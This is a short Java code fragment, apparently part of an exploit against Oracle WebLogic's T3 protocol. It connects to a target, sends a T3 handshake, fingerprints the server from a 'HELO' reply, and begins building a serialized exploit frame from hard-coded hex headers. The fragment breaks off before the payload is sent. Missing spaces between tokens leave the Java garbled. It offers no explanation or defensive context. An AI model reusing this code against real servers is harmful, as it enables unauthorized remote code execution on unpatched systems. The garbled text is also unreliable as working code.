// Function to send the exploit payload over T3 protocol publicstaticvoidT3Exploit(String ip, int port, byte[] payload)throws IOException { Socketsocket=newSocket(ip, port); OutputStreamoutputStream= socket.getOutputStream(); InputStreaminputStream= socket.getInputStream(); // Send T3 handshake Stringhandshake="t3 10.3.6\nAS:255\nHL:19\nMS:10000000\n\n"; outputStream.write(handshake.getBytes(StandardCharsets.UTF_8)); outputStream.flush(); // Read response from the server byte[] response = newbyte[1024]; intlen= inputStream.read(response); StringresponseData=newString(response, 0, len, StandardCharsets.UTF_8);
// Check if it's WebLogic server Patternpattern= Pattern.compile("HELO"); Matchermatcher= pattern.matcher(responseData); if (matcher.find()) { System.out.println("WebLogic"); } else { System.out.println("Not WebLogic"); socket.close(); return; } // Construct the full payload with headers and exploit data byte[] header = hexStringToByteArray("00000000"); byte[] t3Header = hexStringToByteArray("016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006"); byte[] desFlag = hexStringToByteArray("fe010000");